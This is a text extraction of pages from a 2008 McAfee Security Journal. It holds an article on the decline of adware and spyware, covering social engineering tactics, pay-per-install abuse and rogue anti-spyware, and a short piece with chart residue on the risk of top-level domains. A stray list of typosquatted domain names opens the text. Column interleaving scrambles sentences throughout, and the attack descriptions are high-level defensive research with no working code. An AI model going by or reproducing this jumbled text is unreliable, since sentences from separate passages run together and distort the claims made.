ccartoonnetwork.com ckartoonnetwork.com cairtoonnetwork.com dcartoonnetwork.com jcartoonnetwork.com cuartoonnetwork.com ncartoonnetwork.com vcartoonnetwork.com acartoonnetwork.com cfartoonnetwork.com caertoonnetwork.com bcartoonnetwork.com ceartoonnetwork.com caortoonnetwork.com canrtoonnetwork.com

FALL 2008 37 Whatever Happened To Adware And Spyware?

By Aditya Kapoor

Adware and spyware are two of the primary tools used for the online promotion of advertising and marketing.

These applications often benefit from social engineering meth- • Adware A type of advertising display software that delivers odologies and often piggyback on an otherwise useful freeware advertising content potentially in a manner or context that may or shareware application that a user wants to download. These be unexpected and unwanted by users. The ASC’s Risk Model unwanted applications typically come with end-user license document details many of the behaviors that may be consid- agreements (EULAs) that are supposed to define their behavior. ered unexpected or unwanted. Many adware applications also However, these descriptions are normally not explicit or useful, perform tracking functions and, therefore, may also be catego- causing confusion for users and opening the door to further rized as tracking technologies. Some consumers may want to social engineering traps. remove adware if they object to such tracking, do not wish to In the first half of this decade, adware and spyware—often see the advertising caused by the program, or are frustrated called potentially unwanted programs, or PUPs—grew expo- by its effects on system performance. On the other hand, some nentially. After 2005, however, we have seen a constant decline users may wish to keep particular adware programs if their in their numbers. In this article we’ll highlight the key changes presence subsidizes the cost of a desired product or service in online compensation models that are the driving factor of or if they provide advertising that is useful or desired, such as this decline. Adware and spyware have mostly split into distinct ads that are competitive or complementary to what the user fields: the former with cleaner applications and a better user- is looking at or searching for. consent model developed by key adware players and the latter • Spyware In its narrow sense, spyware is a term for track- sometimes malicious and frequently defined as Trojan malware. ing software deployed without adequate notice, consent, or This comparatively clean divide has helped keep the numbers control for the user. In its broader sense, spyware is used as a of adware and spyware applications low. So if these PUPs are synonym for what the ASC calls “Spyware (and Other Poten- no longer a threat, will they soon be gone for good? To answer tially Unwanted Technologies)”: technologies deployed without that, we will discuss the changing threat landscape and the role appropriate user consent and/or implemented in ways that social engineering plays. impair user control over: – Material changes that affect their user experience, privacy, Seeking Clarity or system security – Use of their system resources, including what programs are The terms adware and spyware are frequently used loosely and installed on their computers interchangeably and often create confusion. We’ll follow defini- tions supplied by the Anti-Spyware Coalition (ASC).1 – Collection, use, and distribution of their personal or other sensitive information

38 McAFEE SECURITY JOURNAL Acknowledging that the common term spyware has now largely As traffic and payments increase, John could decide to use an drifted from its exact meaning, the members of the ASC have exploit to install the adware application without the users’ being decided to use “spyware” (in its narrow sense) for technical aware of the installation. Many such applications display a EULA documents. Recognizing further that it is impossible to avoid the before installing, but this would only alarm visitors, so John might wider connotations arising from popular usage, the ASC also further decide to tweak the application to suppress the EULA and notes the existence of a general interpretation that includes all increase his installation score. Now if John is a seasoned hacker, PUPs. In this article, the term spyware is never used in its broad he could replicate this model on thousands of compromised sites sense, but always in the narrow sense, namely, as software that to exponentially increase his installations and payoff. Fellow is related to marketing. We use the term monitoring software McAfee Security Journal author Benjamin Edelman describes a to define pure spy programs such as keyloggers. similar, real scenario on his web site.5

A Fast Takeoff

Adware and spyware grabbed our attention in the year 2000 Adware5000 with the appearance of Adware-Aureate, which employed the 4000 user’s browsing history to display ads. This move led to the creation of one of the first anti-spyware applications, Gibson 3000 Research Corp.’s OptOut.2 2000 Adware and spyware started growing prominently around late 1000 2004 and peaked in 2005. (See Figures 1 and 2.) The primary 0 motive was to generate revenue via millions of installations on 2000 2001 2002 2003 2004 2005 2006 2007 2008 users’ desktops (via the pay-per-installation model) as well as to forecast display advertisements (via the pay-per-click model). The adware Figure 1: Adware growth reached its peak in 2005. (Source: McAfee Avert Labs). and spyware industry flourished in these years due to the large amount of revenue generated from ads. Every time a user clicked a certain ad, the ad provider received a commission.

Spyware300 and monitoring software Compensation Models and Caveats 250 200 Adware and spyware use two major compensation models for online advertisements. Both models work well in a perfect 150 world, but how do they fare in a world that includes people 100 with malicious intent? Let’s take a look at how these models 50 can be exploited. 0 3 2000 2001 2002 2003 2004 2005 2006 2007 2008 Pay-per-install: The client-side model. forecast In the pay-per-install (PPI) model, companies selling products or Spyware services pay the adware provider to display ads. The adware pro- Monitoring programs vider in turn pays individuals or affiliates to distribute its adware Figure 2: Spyware and monitoring programs have also seen a general decline since using bundling or other means. (ZangoCash, for example, pays 2005, but we anticipate an upturn in the latter in 2008. (Source: McAfee Avert Labs). from $0.75 to $1.45 in the United States for each piece of adware installed.4) The software finally has to be installed on the client machine. The PPI model normally tracks installations of software by using a particular referrer. So, if John Doe hosts a PPI-based adware installer on his web site and some other user downloads and installs that software via the site, John will receive a certain amount of money. To increase the downloads from his site, John might try to increase traffic using attention-getting content such as catchy titles, adult images or videos, free games, or ringtones.

FALL 2008 39 The PPI model of compensation proved very lucrative for pro- To better mitigate the attack vectors exploiting these compensation grammers as well as for people with malicious intent—thus models, let’s take a brief overview of how social engineering plays a contributing to the fantastic growth of adware and spyware. role in this online market of endless revenue-generation possibilities. Many installation vectors support this model. These vectors can be broadly divided into two categories: Social Engineering Aspects • Social engineering This requires user interaction and relies on the user to install and, in some cases, even propagate the Hackers are going to go after the weakest link in the security software. The number of social engineering methods is limited chain, which is always the people. — Kevin Mitnick (2007)11 only by the imaginations of attackers, who can often lure even the most vigilant users. In the example of John Doe, offering Regardless of the model adware developers use, their primary free games or ringtones is bait that many people cannot resist. success factor is users. In our example of John Doe, people were Ultimately, the user decides to take the risk or leave the free infected because they visited the malicious web site driven by goodies on the table. Doe’s social engineering tactics. One reason social engineering is frequently successful is because many people trust what they • Exploits Installation of adware through exploits may not see and are, by nature, not suspicious of certain online activities. require any human interaction at all; however, in many cases Malicious social engineers know how to exploit human nature. the user is lured by social engineering techniques to malicious A case study conducted by the U.S. Department of the Interior, web sites that host these exploits. points out that 84 percent of government departments attribute various security breaches to human error; 80 percent of the Pay-per-click: The server-side model.6 departments attribute these errors to a lack of security training, 12 The pay-per-click (PPC) model has two variations: sponsored ads security knowledge, or failure to follow procedures. and content-based ads. Hundreds of thousands of malware use social engineering to get The PPC model does not require any adware or spyware software installed on users’ machines: this is one of the most common vec- to be installed on the user’s system, but the model may depend tors of malware delivery. Matthew Braveman categorizes various 13 on the user’s input for context—for example, from search engine installation vectors in four major categories. According to his results—to provide relevant ads. Google content-based ads, for study, almost one-third of the malware was installed by leverag- example, work by using the PPC model. ing social engineering methods. Some of most common delivery mechanisms for PPC content are: Adware and spyware have adopted many popular social engineering methodologies and have come up with new techniques • Banner ads Ads are shown within a banner or predefined to distribute their software. Social engineering is the favored space. This content can change. installation vector of the PPI model, which offers broader options • Pop-up or pop-under ads Ads are delivered in separate for delivering adware and spyware. These applications can be windows, creating an annoying user experience. delivered using apparently innocuous mechanisms, such as bundled freeware or by suspicious mechanisms, such as spam • Flash-based ads These are similar to banner ads but use flash or email attachments with deceptive text. A user who wants animation to vary the ad content. freeware, for example, can knowingly install adware to use The PPC model can work in a much more controlled environ- the free services. Even if an installation occurs via an exploit or ment, in which in the web site hosting these ads may choose the direct spam, security companies may still not determine that the delivery mechanism. Although the PPC model is server based and software is malicious because of vendor claims that they have would seem more secure, it’s not entirely foolproof. Scammers no role in this distribution and that other people are exploiting can still use deceptive practices to trick users.7 their software. Because most of the ad content is stored on servers and uses JavaScript, Flash, and other rich-content technologies, inserting malicious ads in the ad stream is not difficult.8, 9 In one such case, a Yahoo-owned ad network unknowingly distributed malicious banner ads that eventually downloaded Trojans on users’ Because most of the ad content is stored machines. In this particular scenario, banner ads were shown on web sites such as MySpace and PhotoBucket. These malicious ads on servers and uses JavaScript, Flash, were slipped into Yahoo’s ad network undetected. We’ve also and other rich-content technologies, seen user clicks hijacked by DNS cache poisoning.10 However, users are not directly affected in these cases; the ISP or server hosting inserting malicious ads in the ad stream the ads is more vulnerable to these threats. is not difficult.

40 McAFEE SECURITY JOURNAL Social networking web site high trust level

Search engine low trust level Social engineering web site User (e.g., offering free MP3 links, Link received via IM, email, spam adult video, etc.) lowest trust level

Link received via friend’s profile in social networking site, Google notebook, trusted domain, etc. high trust level

Figure 3: Several vectors expose users to unwanted and malicious programs.

It’s about trust Case 2: Banner ads Figure 3 depicts four scenarios for user exposure to a social Banner ads lie in the domain of the PPC model. The trust level in engineering site. Although the illustration is simple, it can help these real-world scenarios was very high, as users were visiting us understand the following real-world cases. The key is that the trusted site that they visited frequently. higher the trust level, the more likely a particular social engineer- • In 2006, The Washington Post reported a malicious banner ad ing technique will succeed. We’ll explain further using three brief in MySpace that served adware as well as Trojans to millions of case studies. users using Microsoft Windows Metafile exploits; this did not require any user intervention.17 Case 1: Social networking web sites • In 2008, we’ve seen an increase in malicious banner ads. The Social networking sites are a boon to social engineers because latest at the time we wrote this article was a Flash-based ad at most people on these sites are looking to make or stay in touch usatoday.com.18 Just by visiting the page, users were socked with friends. Social engineers may create relationships to increase with multiple malware as well as fake alerts (a popular social the trust factor, as shown at the top of Figure 3. The trust level is engineering tactic) to download a rogue antispyware applica- usually very high for this category. tion called Malware Alert. (Rogue programs can include PUPs as well as Trojans.) A number of notable social engineering attacks have exploited this trust to install adware on users’ machines: • MySpace Adult Content viewer (trust level: medium). This Case 3: Other intriguing tactics incident relied on a user clicking a pop-up ad featuring young • Spoofed email (trust level: low). In one case, spoofed emails people with title such as “I want to be loved.”14 Clicking on from eBay were spammed with the links pointing to download these ads downloaded the MySpace Adult Content software adware.19 The social engineering aspect occurred in the content that reportedly downloaded adware. of the email, which “warned” unsuspecting users that there was a problem in their billing information and that they needed to • MySpace Fraudulent YouTube Video (trust level: high). Web- Sense reported in late 2006 a fraudulent YouTube video that update the data by downloading particular software. was posted on multiple fake profiles at MySpace.15 Attempting • Fake error pages (trust level: medium). Certain web sites dis- to view the video required installing Zango Cash. played fake “page not found” error messages and offered to resolve the situation by downloading an ActiveX component • Facebook Secret Crush Application (trust level: very high). In 20 January 2008, Fortinet generated an advisory about a malicious that installed WinFixer. widget called Secret Crush that was trying to install adware.16 • Google notebook spam (trust level: high). In a recent develop- This social engineering tactic worked by first sending a Face- ment, scammers used yet another social engineering technique book request with the title “1 secret crush invitation.” Upon by spamming links to Google notebook pages.21 The hyperlink opening this request, the user had to install a widget to find is in the format www.google.com/notebook/public/[UserID]/ out who sent the secret crush. The request further prompted [blocked]. The domain google.com makes people less suspi- the user to forward it to five friends before it would display cious and encourages them to click on the malicious web who sent the crush. Naïve users forwarded this message to pages, which host multiple links to adult sites or fake videos. friends, making this a social worm. After taking these steps These eventually download various rogue anti-spyware apps. all that users saw was a message to download Adware Zango. Victims were easily lured by this scenario because the trust level was very high.

FALL 2008 41 A Silent Retreat Rogue Applications

The initial lack of laws regulating adware and spyware applica- Because malware authors gain easy money using scare tactics, tions gave lots of freedom to their developers, whether their there is an increasing trend to distribute rogue applications and motivations were merely financial or actually malicious. At fake “alert” Trojans, which display bogus error or infection mes- first, users seemed protected because they had EULAs to warn sages. In most cases, the fake alert Trojans are the downloaders them of any unwanted effects from these applications. But of the rogue applications that detect false registry keys and files as the EULAs were often confusing, incomplete, or unseen. Once malware. Sometimes, these rogue applications drop the files just found, they’re hard to read—often enclosed in tiny windows to detect them later; in these cases, the rogue application warrants that display only a few words at a time. With such an effective a “Trojan” classification (such Trojans are included in Figure 4). smokescreen, why have adware and spyware declined? Several We have also observed many cases of adware installed by Trojans. factors have contributed. The Downloader-UA Trojan category is one such family that uses • Lawsuits Due to an increase in abuses by adware and spy- social engineering tactics to download fake programs. Discovered ware apps, consumers and other plaintiffs have filed multiple in late 2004, this family employs loopholes in the way Microsoft lawsuits against some big distributors.22 23 24 25 26 27 Windows Media Player uses digital rights management technol- 31 32 Various court rulings have helped to limit the numbers of ogy by luring users to download specially crafted media files. In 2008, the same family of Trojan was involved again in luring adware and spyware. In the settlement against Zango,12 for example, the court “requires that Zango monitor its third-party users to download a fake MP3 player to play a canned selection 33 distributors to assure that its affiliates and their sub-affiliates of songs; it also downloaded heaps of adware to their systems. comply with the FTC order.” The ruling also “bars Zango, The growth of rogue applications (PUPs and Trojans) has directly or through others, from exploiting security vulnerabili- been exponential in 2008 when compared with previous years. ties to download software, and requires that it give clear and (See Figure 4.) prominent disclosures and obtains consumers’ express consent To gauge the frequency of rogue anti-spyware products distrib- before downloading software onto consumers’ computers.” uted via downloader Trojans, we analyzed a set of IP addresses Such orders have helped to weaken the PPI method and have involved in initiating these downloads. A query executed at driven ad distributors to clean up their acts. domain hosts-files.net returned 158 domains associated with • Public awareness and industry groups The Federal Trade the same IP address.34 (See Figure 5.) Commission has an informative web site28 that provides tips on how to protect against spyware and how to report abuses. The Anti-Spyware Coalition also offers a lot of information and details about this threat.29 Due to the efforts of these organizations, both consumers and lawmakers have a much better understanding of the issues and rules related to online Rogue applications advertising. This increased awareness has helped to lower the 1000 occurrence of these unwanted applications. 500 • Bad publicity and potential lawsuits against advertisers having association with adware companies The money 0 2005 2006 2007 2008 that drove the adware and spyware market initially came from forecast advertisers that used adware companies to show the ads. PUP These product and service companies did not at first fully Trojan investigate how the adware firms distributed their ads. In a historic settlement published on January 29, 2007,30 the Figure 4: Unlike adware and spyware, rogue applications (PUPs and Trojans) have increased dramatically in 2008. (Source: McAfee Avert Labs). agreement stated that “prior to contracting with a company to deliver their ads, and quarterly thereafter, the companies must investigate how their online ads are delivered. The companies must immediately cease using adware programs that violate the settlement agreements or their own adware policies.” Because advertisers now understand the risks (invasion of privacy, improper consent, and others) associated with the PPI model, they are moving toward the PPC model, which requires no applications on users’ systems.

42 McAFEE SECURITY JOURNAL Conclusion

Looking solely at an analysis of statistics suggests that the growth of adware and spyware is on the decline. However, the intriguing social engineering tactics that are used to distribute these PUPs are still with us, delivering rogue applications and Trojans. With the increase of the server-side model (PPC) of ad delivery, we will certainly see improved social engineering tactics luring users to click on these ads and generate revenue for the affiliates. The distribution of adware and Trojans will continue to gain ground at social networking sites. Although the overall number of adware and spyware has declined, we see no easy solution in the near future to the problem of unwanted programs. Because adware companies pay for such installations, their moral duty should be to keep track of each installation and quickly stop any potential Figure 5: Multiple hostnames map to a single IP address that distributes misdistribution of their software. But will they really do this? localized rogue applications. With the changing threat landscape and the increase in revenue-motivated Trojans, we have to remain vigilant and train employees and home users to better understand the threat of social engineering. Each of the domains shown in Figure 5 displays either a custom rogue anti-spyware or rogue “system cleaner” product. The pages appear in various languages, as well. In analyzing 620 pages, we found 24 languages used to create both pages and applications that show the threats have spread far beyond English-speaking Aditya Kapoor is a senior researcher at McAfee countries. More than once, a single IP is associated with multiple Avert Labs. He was introduced to reverse engineer- domains; in some cases we saw up to 200 different domains. One ing six years ago while researching at the University query for the keyword “FSA” (which hosts-files.net describes as of Louisiana at Lafayette for his master’s thesis, a class of domains hosting rogue applications) returned close to which focused on a sliding disassembly algorithm 3,600 domains distributing rogue applications.35 to tackle code obfuscation. At McAfee, Kapoor developed skills in rootkit analysis, byte code comparison, and behavior analysis. He enjoys traveling and studying different cultures and architectures.

endnotes 1 http://www.antispywarecoalition.org/documents/2007glossary.htm 18 http://securitylabs.websense.com/content/Alerts/3061.aspx 2 optOut, Gibson Research Corp. http://www.grc.com/optout.htm 19 http://securitylabs.websense.com/content/Alerts/738.aspx 3 http://en.wikipedia.org/wiki/Compensation_methods 20 http://www.avertlabs.com/research/blog/index.php/2006/12/04/404-not-just- 4 source: Zango web site. http://www.cdt.org/headlines/headlines.php?iid=51 file-not-found/ 5 http://www.benedelman.org/news/062907-1.html 21 http://www.cantoni.org/2008/06/04/google-notebook-spam 6 http://en.wikipedia.org/wiki/Compensation_methods#Pay-per-click_.28PPC.29 22 http://www.benedelman.org/spyware/nyag-dr/ 7 http://www.benedelman.org/ppc-scams/ 23 http://www.oag.state.ny.us/media_center/2005/apr/apr28a_05.html 8 http://msmvps.com/blogs/spywaresucks/archive/2007/08/22/1128996.aspx 24 http://www.internetlibrary.com/cases/lib_case358.cfm 9 http://www.theregister.co.uk/2007/09/11/yahoo_serves_12million_malware_ads/ 25 http://blogs.zdnet.com/Spyware/?p=655 10 http://www.secureworks.com/research/threats/ppc-hijack/ 26 http://www.ftc.gov/opa/2006/11/zango.shtm 11 http://www.csc.com/cscworld/012007/dep/fh001.shtml 27 http://www.ftc.gov/bcp/edu/microsites/spyware/law_enfor.htm 12 http://www.usgs.gov/conferences/presentations/5SocialEngineeringInternal 28 http://onguardonline.gov/spyware.html ExternalThreat%20Dudeck.ppt 29 http://www.antispywarecoalition.org/ 13 http://download.microsoft.com/download/c/e/c/cecd00b7-fe5e-4328-8400- 30 http://www.oag.state.ny.us/media_center/2007/jan/jan29b_07.html 2550c479f95d/Social_Engineering_Modeling.pdf 31 http://www.pcworld.com/article/119016/risk_your_pcs_health_for_a_song.html 14 http://mashable.com/2006/10/11/myspace-adult-content-viewer-more-adware/ 32 http://vil.nai.com/vil/content/v_130856.htm 15 http://securitylabs.websense.com/content/Alerts/1300.aspx 33 http://www.avertlabs.com/research/blog/index.php/2008/05/06/fake-mp3s- 16 http://www.fortiguardcenter.com/advisory/FGA-2007-16.html running-rampant/ 17 http://blog.washingtonpost.com/securityfix/2006/07/myspace_ad_served_ad- 34 http://hosts-file.net/?s=67.55.81.200&sDM=1#matches ware_to_mo.html 35 http://hosts-file.net/?s=Browse&f=FSA

FALL 2008 43 How Risky Are Top-Level Domains? by David Marcus

McAfee SiteAdvisor data shows how risk varies around the world.

In his excellent paper “Mapping the Mal Web, Revisited,” Reading the graphs In the chart labeled “Europe, Middle East published in the June 2008 issue of McAfee Security Insights,1 and Africa TLDs ranked by overall risk,” you’ll see in the left-most our colleague Shane Keats thoroughly examined the distribution bar that Romania—domain .ro—registered almost seven percent. of malicious web sites across the Internet using data from McAfee® This means that, according to SiteAdvisor software, McAfee has SiteAdvisor® technology. In this day and age, people need to found that almost seven percent of all sites within that top-level know where it is safe to surf and search. But if the Internet really domain have suffered from one or more of the threats we’ve is a big digital neighborhood, reflective of any big city in the measured: browser exploits, adware/spyware/Trojans/viruses, world, which streets are safe to cross? Which domains are riskier high-volume commercial email, affiliations with other risky sites, than others? Which top-level domain (TLD) has shown the most aggressive pop-up marketing, or SiteAdvisor community reviews improvement in safety? Which has shown the least? What search or comments. The higher the figure, the greater the risk to users. words are riskier than others? In addition to an overall figure, we’ve charted the change in risk from the previous year. The line graph shows that in Romania the Internet users ask themselves these questions more and more. risk has increased by about one percent, whereas in Slovakia, for The McAfee Security Journal is dedicated to helping you find example, the risk has decreased by about three percent. Positive those answers by providing data and analysis that helps you numbers indicate increased risk compared with the previous year; make the best decisions possible. negative percentages indicate decreased risk. In this edition, we summarize recent threat data regarding top-level domains: both generic TLDs—.com, .info, .biz, and so on—as well as country TLDs—.cn, .ru, .br, and others. We look closely not only at the present risk levels of these domains in the Americas, Europe, and Asia but also at how they have changed David Marcus is Director of Security Research and over the last year. We ranked each TLD by overall risk and then Communications for McAfee Avert Labs. He brings Avert Labs’ extensive security research to McAfee’s performed additional analysis of email practices, download safety, customers and the greater security community. and the prevalence of web-based exploits; and we broke out the Marcus’ current responsibilities include PR, media top twenty top-level domains for each type of risk. and thought leadership, serving as blogmaster for McAfee Avert Labs Security Blog, as well as The results were striking. Risk is not spread equally across the being co-host of AudioParasitics—The Official Internet, as this data clearly illustrates. The generic and country PodCast of McAfee Avert Labs. He also manages all publications from Avert Labs, including McAfee domains showed varying types and degrees of risk and dangers. Security Journal. Some countries benefited from good email habits yet demon- strated poor download practices. Others suffered from hosting exploits or malicious code. We hope these results will help you as you surf. Remember to look both ways before crossing the ENDNOTE Internet highway! 1 http://www.mcafee.com/us/security_insights/archived/june_2008/si_jun1_08.html

44 McAFEE SECURITY JOURNAL Europe, Middle East, and Africa TLDs ranked by overall risk

8.0% Change in Risk 2007–2008 by points 6.0% Overall Risk 2008 4.0% 2.0% 0.0% -2.0% -4.0% ey .tr ay .no Iran .ir Italy .it akia .sk Israel .il Spain .es Latvia .lv rk Tu ance .fr Fr Africa .za Russia .ru nland .fi Fi

land .p l Po Ireland .ie Iceland .is Greece .gr Austria .a t ortugal .p t Croatia .hr Estonia .ee Slovenia .si Sweden .se S. Ukraine .u a Norw P Slov Belgium .be Lithuania .l t Bulgaria .bg Romania .ro Hungary .h u Denmark .dk Germany .d e goslavia .yu Yu Switzerland .ch Netherlands .n l European Union Czech Republic .cz United Kingdom .uk

Asia TLDs ranked by overall risk

20.0% Change in Risk 2007–2008 by points 18.0% Overall Risk 2008 16.0% 14.0% 12.0% 10.0% 8.0% 6.0% 4.0% 2.0% 0.0% -2.0% -4.0% -6.0% -8.0% -10.0% .jp alu .tv an) .tw elau .tk ong .hk orea .kr India .in onga .to Niue .nu Japan T v Tu ietnam .vn aiw anuatu .vu hailand .th k To T V V Samona .ws of China .cn Australia .au s. .cc eeling) I s. Indonesia .id Malaysia .my Singapore .sg Philippines .ph Hong K .R. South K s. .cx Christmas I s. P New Zealand .nz Cocos (K of China (T R.

Americas TLDs ranked by overall risk Risk criteria used to measure TLDs

2.5% Change in Risk Browser exploits 2007–2008 by points 2.0% Overall Risk 2008 1.5% 1.0% Adware/spyware/ High volume 0.5% Trojan/viruses commercial email 0.0% -0.5%

-1.0% Affiliations with Aggressive pop-up other risky sites marketing -1.5% Chile .cl Brazil .br Canada .ca Mexico .m x SiteAdvisor community Colombia .co Argentina .ar nezuela .ve Ve reviews/comments United States .us

FALL 2008 45 Top 20 TLDs ranked by download risk

25.0% Change in Risk 2007–2008 by points 20.0% Overall Risk 2008 15.0% 10.0% 5.0% 0.0% -5.0% alu .tv Italy .it elau .tk Israel .il onga .to Latvia .lv T v Tu ietnam .vn k To Samoa .ws Belgium .be V Bulgaria .bg Romania .ro of China .cn Business .biz s. .cc eeling) I s. Network .net .R. s. .cx Christmas I s. P Information . info United States .us Commercial .com Cocos (K amilies/Individuals .name F

Top TLDs ranked by email practices

70.0% Change in Risk 2007–2008 by points 60.0% Overall Risk 2008 50.0% 40.0% 30.0% 20.0% 10.0% 0.0% -10.0% -20.0% an) .tw ong .hk akia .sk orea .kr India .in Latvia .lv Russia .ru Croatia .hr aiw hailand .th Samoa .ws Ukraine .ua Slov T Bulgaria .bg of China .cn Business .biz s. .cc eeling) I s. Network .net ugoslavia .yu Y Hong K .R. South K P Information .info Commercial .com European Union .eu Cocos (K of China (T R.

Top 20 TLDs ranked by exploits

1.2% Change in Risk 2007–2008 by points 1.0% Overall Risk 2008 0.8% 0.6% 0.4% 0.2% 0.0% -0.2% -0.4% ong .hk India .in onga .to Niue .nu oland .pl T Russia .ru P ortugal .pt Croatia .hr ietnam .vn Samoa .ws Ukraine .ua P V Romania .ro of China .cn Business .biz s. .cc eeling) I s. Network .net Hong K .R. P Information .info United States .us Commercial .com Cocos (K amilies/Individuals .name F

46 McAFEE SECURITY JOURNAL FALL 2008 47 McAfee, Inc. 3965 Freedom Circle Santa Clara, CA 95054 USA 888 847 8766 www.mcafee.com

McAfee and/or additional marks herein are registered trademarks or trademarks of McAfee, Inc. and/or its affiliates in the United States and/or other countries. McAfee red in connection with security is distinctive of McAfee brand products. All other registered and unregistered trademarks herein are the sole property of their respective owners. © 2008 McAfee, Inc. All rights reserved.

5001_sec-jrnl_fall08 48 McAFEE SECURITY JOURNAL